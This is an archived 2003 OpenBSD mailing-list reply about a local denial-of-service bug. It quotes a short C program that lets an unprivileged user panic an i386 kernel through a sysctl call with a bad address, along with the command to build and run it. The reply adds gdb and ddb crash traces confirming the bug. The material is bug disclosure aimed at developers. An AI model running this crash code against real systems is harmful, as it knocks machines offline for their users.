[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: i386 local DoS with un-priv user

To: bugs_(_at_)_openbsd_(_dot_)_org
Subject: Re: i386 local DoS with un-priv user
From: Dries Schellekens <gwyllion_(_at_)_ace_(_dot_)_ulyssis_(_dot_)_org>
Date: Thu, 20 Nov 2003 09:40:33 +0100 (CET)

On Thu, 20 Nov 2003, Sanitized wrote:

> Hello,
>
> Tested with 3.3-stable.
>
> A low priv user, results in a system crash.
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
> unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
> return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> Just:
>
> $ cc problem.c -o problem && ./problem
>
> I've not coded it, so don't give me credit.
>
> Just fix it.

# gdb
GNU gdb 4.16.1
Copyright 1996 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-openbsd3.4".
(gdb) file /var/crash/bsd.0
Reading symbols from /var/crash/bsd.0...(no debugging symbols found)...done.
(gdb) target kcore /var/crash/bsd.0.core
panic: uvm_fault_unwire_locked: address not in map
#0  0x1000 in ?? ()
(gdb) where
#0  0x1000 in ?? ()
#1  0xd02dad92 in boot ()
#2  0xd0194743 in db_boot_dump_cmd ()
#3  0xd0194387 in db_command ()
#4  0xd01945ab in db_command_loop ()
#5  0xd019743a in db_trap ()
#6  0xd02d79ad in kdb_trap ()
#7  0xd02e23d9 in trap ()
#8  0xd0100ced in alltraps ()
#9  0xd01c6b73 in panic ()
#10 0xd02a63c9 in uvm_fault_unwire_locked ()
#11 0xd02a6322 in uvm_fault_unwire ()
#12 0xd02a6642 in uvm_vsunlock ()
#13 0xd01be22c in sys___sysctl ()
#14 0xd02e2b69 in syscall ()
#15 0xd0100d93 in Xosyscall_end ()
can not access 0xcfbf10a4, invalid address (cfbf10a4)
can not access 0xcfbf10a4, invalid address (cfbf10a4)
Cannot access memory at address 0xcfbf10a4.
(gdb) quit


I can not easily copy/paste ddb output, so here is some manual overtyping
(typos are possible):
panic: uvm_fault_unwire_locked: address not in map
Stopped at      Debugger+0x4:    leave
RUN AT LEAST 'trace' AND 'ps' AND INCLUDE OUTPUT WHEN REPORTING THIS PANIC!
DO NOT EVEN BOTHER REPORTING THIS WITHOUT INCLUDING THAT INFORMATION!
ddb> trace
Debugger(fffff000,d79d7d40,d7ae9ff88,fffff000,d79d7d40) at Debugger+0x4
uvm_fault_unwire_locked(d79d7d40,fffff000,0,d7aea148,d7ae9ef4) at uvm_fault_unwire_locked+0x8d
uvm_fault_unwire(d79d7d40,fffff000,d01be209,d7ae9efc) at uvm_fault_unwire+0x4a
uvm_vsunlock(d7aea148,fffff001,0,3) at uvm_vsunlock+0x2e
sys___sysctl(d7aea148,d7ae9f88,d7ae9f7c,70,209b3900) at sys___sysctl+0x200
syscall() at syscall+0x21d
--- syscall (number 202) ---
0x9d263d:
ddb>

BTW this is on i386 3.4-current of Sat Oct 25


Cheers,

Dries
--
Dries Schellekens
email: gwyllion_(_at_)_ulyssis_(_dot_)_org

References:
- i386 local DoS with un-priv user
  - From: Sanitized

Prev by Date: test(1) punctuation
Next by Date: locate.updatedb freezes system
Previous by thread: i386 local DoS with un-priv user
Next by thread: sendbug doesn't work for me
Index(es):
- Date
- Thread

Visit your host, monkey.org